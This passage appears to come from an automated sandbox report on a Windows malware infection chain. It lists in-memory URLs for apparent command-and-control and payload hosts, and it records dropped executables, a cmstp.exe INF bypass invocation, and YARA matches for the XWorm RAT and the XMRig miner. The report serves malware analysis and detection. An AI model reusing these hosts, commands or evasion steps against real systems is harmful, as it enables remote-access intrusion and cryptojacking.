                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api1Sw
                          Source: e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api6
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433742017.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2415236247.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433969582.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416120330.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2416925448.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2418623510.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiMSwhVz
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2789195144.0000000000627000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2772005516.0000000000622000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2465911850.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451466201.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476241959.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiTRy
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiU
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apibu
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apibuR
                          Source: e44fda3216.exe, 0000000B.00000003.2451466201.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apieDU
                          Source: e44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apiob
                          Source: e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apip
                          Source: e44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/apis
                          Source: e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/api~
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/mfilJ
                          Source: e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/ppda
                          Source: e44fda3216.exe, 0000000B.00000003.2466779696.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2476670946.0000000000605000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2475404002.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2451953024.0000000000609000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506333471.0000000000609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop/ppli
                          Source: e44fda3216.exeString found in binary or memory: https://letterdrive.shop:443/api
                          Source: e44fda3216.exe, 0000000B.00000003.2440651482.0000000000623000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2439713957.0000000000623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://letterdrive.shop:443/apiQh
                          Source: powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                          Source: svchost.exe, 0000000A.00000003.2339462163.0000026F20756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                          Source: 9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Zankop/baxter/refs/heads/master/1027
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, Ele.exe, 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                          Source: Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                          Source: e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                          Source: e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: e44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: e44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: e44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: e44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: svchost.exe, 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003656000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.ple
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.p
                          Source: Ele.exe, 00000009.00000002.3318620989.0000000003646000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txt
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txt--cinit-stealth-targets=Taskmgr.exe
                          Source: svchost.exe, 00000035.00000002.3326027564.0000022088243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtP
                          Source: svchost.exe, 00000035.00000003.2524505739.000002208828E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtRunning
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exe
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehash
                          Source: svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6
                          Source: svchost.exe, 00000035.00000002.3317800557.0000022087A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpll
                          Source: svchost.exe, 00000035.00000003.2538990041.000002208826A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3336245903.0000022088266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpot
                          Source: svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.phpvohvtbtkkqqpcgvy
                          Source: Ele.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://zealous-roentgen.66-63-187-122.plesk.page/98.exe

                          Spam, unwanted Advertisements and Ransom Demands

                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                          System Summary

                          Source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                          Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                          Source: NzL6O1Q[1].exe.5.dr, Settings.cs Long String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, BankAccount.cs Long String: Length: 32327
                          Source: NzL6O1Q[1].exe.5.dr, Person.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Settings.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, BankAccount.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.5.dr, Person.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Settings.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, BankAccount.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe.20.dr, Person.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Settings.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, BankAccount.cs Long String: Length: 32327
                          Source: NzL6O1Q.exe0.20.dr, Person.cs Long String: Length: 32327
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: random[1].exe.5.drStatic PE information: section name: .idata
                          Source: random[1].exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: 718e743381.exe.5.drStatic PE information: section name: .idata
                          Source: 718e743381.exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: random[2].exe.5.drStatic PE information: section name: .idata
                          Source: random[2].exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: 739ad26354.exe.5.drStatic PE information: section name: .idata
                          Source: 739ad26354.exe.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: random[1].exe1.5.drStatic PE information: section name: .idata
                          Source: random[1].exe1.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: e44fda3216.exe.5.drStatic PE information: section name: .idata
                          Source: e44fda3216.exe.5.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,5_2_0041CB97
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeFile created: C:\Windows\TEMP\aodefromlpug.sys
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E680C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041DF80 appears 63 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D942 appears 83 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D663 appears 39 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 0041D64E appears 66 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00417A00 appears 38 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 004180C0 appears 263 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00438E10 appears 35 times
                          Source: zjFtdxQ[1].exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: zjFtdxQ.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: zjFtdxQ.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: zjFtdxQ.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: zjFtdxQ.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: zjFtdxQ.tmp.14.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: is-4SN19.tmp.15.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: is-4SN19.tmp.15.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: is-VSE52.tmp.15.drStatic PE information: Number of sections : 11 > 10
                          Source: Ele.exe.6.drStatic PE information: No import functions for PE file found
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Process created: C:\Windows\SysWOW64\cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                          Source: 20.0.NzL6O1Q.exe.720000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                          Source: 53.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                          Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: Process Memory Space: svchost.exe PID: 6596, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
